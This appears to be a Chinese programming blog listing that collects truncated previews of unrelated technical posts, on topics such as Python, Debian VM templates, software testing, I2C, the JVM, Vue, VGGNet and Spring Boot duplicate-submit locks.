小朋友们好&#xff0c;大朋友们好&#xff01; 我是猫妹&#xff0c;一名爱上Python编程的小学生。 和猫妹学Python&#xff0c;一起趣味学编程。 今日主题 咱们今天的内容比较抽象&#xff0c;也比较有趣。 这里的图是指计算机中的图&#xff0c;确切地说&#xff0c;是…

Debian 12 x86_64 OVF (sysin) - 虚拟机自动化模板

Debian 12 x86_64 OVF (sysin) - VMware 虚拟机模板 请访问原文链接&#xff1a;https://sysin.org/blog/debian-12-ovf/&#xff0c;查看最新版。原创作品&#xff0c;转载请保留出处。 作者主页&#xff1a;sysin.org Debian GNU/Linux 12 (bookworm) (Linux debian 6.1.0-…

面试20k的测试工程师什么水平?知彼知己百战不殆...

目录&#xff1a;导读 前言一、Python编程入门到精通二、接口自动化项目实战三、Web自动化项目实战四、App自动化项目实战五、一线大厂简历六、测试开发DevOps体系七、常用自动化测试工具八、JMeter性能测试九、总结&#xff08;尾部小惊喜&#xff09; 前言 面试软件测试你需…

一文看懂python如何执行cmd命令

概要 “ 在进行Python编程时&#xff0c;经常需要使用到操作系统的命令行&#xff0c;这就要求我们学会如何使用Python执行cmd命令。” Python执行cmd命令的几种方法 Python是一种强大而灵活的编程语言&#xff0c;它可以很方便地执行系统命令&#xff0c;与操作系统进行交互。…

软件测试人员灵魂三问

可有过高光时刻&#xff1f;职业立足点是什么&#xff1f;前路在何方&#xff1f; 没有光高时刻的职业&#xff0c;不值得留恋 根据马斯洛需求层次理论&#xff0c;当人们温足饭饱后&#xff0c;还需要尊重和自我实现。 同样&#xff0c;作为测试员&#xff0c;工作不仅仅是…

I2C通信协议,最简单的总线通信

串口通信只能在两个设备之间进行&#xff0c;如果是四组串口通信&#xff0c;那每个设备都需要三组串口&#xff0c;其线路连接相当繁琐&#xff08;如下图&#xff09;。 为了解决这个痛点&#xff0c;人们设计了一种总线通信&#xff0c;总线通信有很多种协议&#xff08;如…

记一次gstreamer解码存图绿线问题排查

背景 业务需求需要将某些解码后的视频帧保存为图片&#xff0c;大部分情况下图片都是正常的&#xff0c;更换了某些视频流后&#xff0c;在保存的图片顶部就会出现一条绿线&#xff0c;现记录下解决过程。 部分代码如下 解码回调如下&#xff0c;完整代码可参考之前的文章G…

JVM零基础到高级实战之内存区域分布与概述

JVM零基础到高级实战之内存区域分布与概述 JVM零基础到高级实战之内存区域分布与概述 文章目录 JVM零基础到高级实战之内存区域分布与概述前言Java语言为甚么优势巨大&#xff1f;总结 前言 JVM零基础到高级实战之内存区域分布与概述 Java语言为甚么优势巨大&#xff1f; 一处…

FMCW 雷达室内多目标人员MATLAB仿真

分享一则代码&#xff0c;主要用于FMCW雷达室内多目标MATLAB仿真&#xff0c;涉及到的内容和算法模块有如下&#xff1a; 1、目标参数设置 2、雷达参数设置 3、目标运动状态设置 4、雷达信号建模&#xff08;IQ信号&#xff09; 5、雷达近场收发几何位置偏差校正 6、距离维FFT…

速刷剑指offer

链接&#xff1a;No5、 用两个栈来实现一个队列 | 阿秀的学习笔记 第五题跳过。栈和队列等着代码随想录二刷补上。 JZ11 旋转数组的最小数字 链接&#xff1a;旋转数组的最小数字_牛客题霸_牛客网 代码&#xff1a; 这个二分法是左闭右开的&#xff0c;就真的不好理解。 class …

Vue - 第五天 动态组件 插槽 自定义指令

动态组件& 插槽& 自定义指令 一、动态组件1.什么是动态组件2.如何实现动态组件渲染3.使用 keep-alive 保持状态4. keep-alive 对应的生命周期函数5. keep-alive 的 include 属性6.动态展示左右组件7.例子 二、插槽1.什么是插槽2.体验插槽的基础用法2.1 没有预留插槽的内…

VGGNet

论文信息 论文名称&#xff1a;Very Deep Convolutional Networks For Large-Scale Image Recognition 论文地址&#xff1a;https://arxiv.org/pdf/1409.1556.pdf 发表期刊&#xff1a; ICLR 发表年份&#xff1a; 2015 论文详情&#xff1a;VGGNet是2014年ILSVRC&#xff08…

【并发篇】04-05 线程池核心参数代码演示

B站 黑马程序员 java八股的视频笔记 自留备忘 如有错误请多多指教。 &#xff08;一&#xff09;理论知识 这道题其实就是在问java中线程池的实现类ThreadPoolExecutor&#xff0c;这个类参数最多的构造方法有7个参数。 线程池本质上就是管理一组线程&#xff0c;用来执行提交…

python:消除已安装库在import导入时出现红线问题

问题 在pycharm中&#xff0c;对于已经安装的库文件&#xff0c;在进行import导入时出现红线&#xff0c;不影响运行&#xff0c; 简单有效的消除红线的方法。 解决办法 在工程目录中的程序可以采用Mark directory - Source Root方法。 对于安装的第三方库文件环境不在本工程…

springboot实现后端防重复提交(AOP+redis分布式锁)单机情况下

文章目录 0、依赖1、自定义接口2、实现redis分布式锁3、自定义AOP4、测试 为什么要实现这个功能呢&#xff0c;可能用户在提交一份数据后&#xff0c;可能因为网络的原因、处理数据的速度慢等原因导致页面没有及时将用户刚提交数据的后台处理结果展示给用户&#xff0c;这时用户…

LayoutTransformer: Layout Generation and Completion with Self-attention

LayoutTransformer: Layout Generation and Completion with Self-attention (Paper reading) Kamal Gupta, University of Maryland, US, Cited:41, Code, Paper 1. 前言 我们解决了在各种领域中&#xff08;如图像、移动应用、文档和3D对象&#xff09;进行场景布局生成的…